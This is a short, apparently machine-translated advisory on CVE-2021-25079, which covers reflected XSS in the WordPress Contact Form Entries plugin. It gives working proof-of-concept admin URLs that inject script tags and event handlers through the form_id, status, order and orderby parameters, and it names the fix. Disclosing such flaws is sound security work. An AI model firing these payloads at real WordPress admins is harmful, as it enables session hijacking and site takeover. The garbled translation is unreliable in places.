WordPress contact form entries cross cross site scripting attack

edition ： < 1.2.4

CVE : CVE-2021-25079

Reference resources ：

https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63

https://secsi.io/blog/cve-2021-25079-multiple-reflected-xss-in-contact-form-entries-plugin/

vxcf_leads Several parameters of the administrator page are vulnerable to reflection cross site scripting vulnerability .

GET /wp-admin/ admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+ 

Returns the list of saved entries in the database . form_id Value reflected in < form_id Parameters are not filtered , So you can inject any value .

http://example.com/wp-admin /admin.php?page=vxcf_leads&form_id=cf_5e1kpc%22+onmouseover%3Dalert%281%29+ne97l&status&tab=entries&search&order=desc&orderby=fir+ 

Allow to inject... Into the input form onmouseover

<input class="hide-column-tog" name="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" type="checkbox" id="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" value="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl" checked='checked' />Source</label><label>

By means of click Move the mouse inside the element , Vulnerability triggered . Even though the vulnerability seems to require the user to move the mouse over the input element , You can also inject a “ style ” Part to improve the attack , This section can extend input elements with large width and height . such , When the user clicks on the link , Will execute javascript Code . status Parameters are vulnerable to the most dangerous XSS attack ： Just send the following request

http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=b9zrb--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eg482f&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date    

Will perform XSS Loophole . order、orderby and search Parameters are also susceptible to XSS attack ：

http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir%20ihj17%22accesskey%3d%22x%22onclick%3d%22alert(1)%22%2f%2fv9tdt 

resolvent ： Upgrade contact table entries to version 1.2.4